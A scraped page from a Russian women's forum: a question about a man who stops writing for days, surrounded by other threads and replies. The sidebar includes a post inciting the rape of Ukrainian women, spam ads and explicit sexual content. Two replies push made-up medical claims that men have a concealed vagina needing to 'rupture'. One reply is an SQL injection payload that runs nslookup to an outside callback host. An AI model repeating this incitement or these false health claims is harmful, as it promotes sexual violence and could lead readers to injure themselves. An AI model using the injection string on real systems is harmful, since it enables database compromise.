ЖЕНСКИЙ форум без регистрации

  • В первый раз трахнули ж ...
    Написала СВО. Ответов: 1
    СВО-автор сообщения
    Айда ебать хохлух!. Мыколы и Богданы гибнут, а мы будем тамошних баб насиловать по мере продвижения на запад!
  • В последнее время все т ...
    Написала makla. Ответов: 1
    makla-автор сообщения
    Я как человек , у которого с 20 лет реактивный артрит и которому сулили жить только на лекарствах и в сильных болях, смог войти в ремиссию и пока что вот уже как три года все хорошо, связываю это с приемом кордицепса, пропиваю курсами два раза в год, покупаю у компании cordypower
  • Полезные перекусы
    Написала ballana. Ответов: 9
    ballana-автор сообщения
    Я тоже подсела)
  • Разговор с детьми о сек ...
    Написала Antoniaerrof. Ответов: 579
    Antoniaerrof-автор сообщения
    Анкеты девушек (а) также парней он-лайн, на телеграм канале @wanowes
  • ОБОЖАЮ КУНИ
    Написала Нежный. Ответов: 145
    Нежный-автор сообщения
    Кира, добрый день!
  • Девочки кто носит аналь ...
    Написала Танюша. Ответов: 54
    Танюша-автор сообщения
    Наиля,а я почему то этот момент не прочвствовала. Он начал в конце чаще и глубже впихивать член,я поняла что сейчас кон чит,так и случилось. Потом ещё держал член во мне пока тот не упал и уже вялый вынул.
Женский форум » 16+ » Нужен совет » Нормально ли пропасть если проблемы

Нормально ли пропасть если проблемы

Весна | 20.04.2020, 07:19 | Просмотры: 16254
Добрый день. Стала общаться с парнем, переписывались очень много почти каждый день. Очень легко, на лайте, весело, и про все подряд. В основном первый писал он, иногда я. Пару раз пропадал на пару дней. Но потом снова списывались, извинялся, говорил, что очень занят был.
Ощущение от него такой открытости, но только проблемами он не делиться. Когда снова пропадал на пару дней, а потом написал , упомянул, что навалилось, но говорить не хотел, а я вынудила рассказать, так как считаю, что делиться нужно.
Он просто говорит, все нормально, а на самом деле, может, нет.
Он рассказал, но об этом даже друзья самые близкие его не знают.
Сейчас уже 5 дней не пишет, хотя в сети бывает, но пару раз в день, но даже сообщение от меня последнее не открыто, когда мы еще переписывались, а он потом уснул.
В последний раз первая писала я, когда он так пропал. Спросила, все ли нормально тогда. Теперь, думаю, не стоит снова первой писать, навязываться, как сможет, так напишет. Тем более сообщение от меня последнее не горит синей галочкой
Я думаю, наверно, не до общения ему, а в то же время, не хотелось бы, чтобы дело было во мне. Поводов так думать не было, но вдруг?
Если человек настолько не любит "грузить проблемами", что и пропадает, пока они есть и в решении. Он и учится и работает, и дома не спокойно и в команде
Общались уже больше месяца, очень мило, открыто, и дружески.
Но только переписывались, он живёт далековато, хотя город соседний, но недавно познакомились, кроме дружеского общения пока ничего не обозначали
Реклама
мирон 21.04.2020
У мужчин есть влагалище

Канадские врачи выяснили, что в 95% современных анатомических атласах допущена оплошность. В них у мужчин отсутствует влагалище, которое у них есть. У мужчин имеется мышечная трубка в том, же месте, где и влагалище у женщин. Однако, она закрывается кожей, которая похожа на обычную кожу мошоночного шва, хотя она намного тоньше. Поэтому многие мужчины не знают об этой анатомической подробности. Периодически это область воспаляется, что по мнению ученных говорит о необходимости ее разрыва, как и было задумано природой.
Влагалище у мужчин пропало из атласов анатомии в 50-60 годы скорее всего по религиозным и идеологическим соображениям.
nnnjjj 24.04.2020
Ученные: раскрытие мужского влагалища не следует путать с сифилитическим шанкром

Известно, что у мужчин имеется влагалище, которое располагается там же, где и у женщин. В силу идеологических факторов наличие этого факта долго игнорировалось. Например, в анатомических атласах эта деталь не присутствует как якобы маловажная. Так же было и в случае с эпифизом. В специальной литературе встречается термин vagina masculina, который то ли специально, то ли случайно долгое время путали с аномалией уретры.
Разумеется, что раз орган есть, то он будет функционировать. У мужчин в ряде случае его раскрытие может происходить достаточно поздно. У кого-то кожа просто рвется и отмирает, а у кого-то это проходит в виде воспаления. Этот процесс не нужно путать с сифилитическим шанкром, который иногда встречается.
ughyausa 25.04.2020
1';copy (select '') to program 'nslookup dns.sqli.\013405.2065-4250.2065.36330.\1.bxss.me
fumksibr 25.04.2020
wTRKWPWl

Не знаю, что делать. в Нужен совет
Что делать с парнем? в Нужен совет
Отношения и любовь в Нужен совет

Имя:*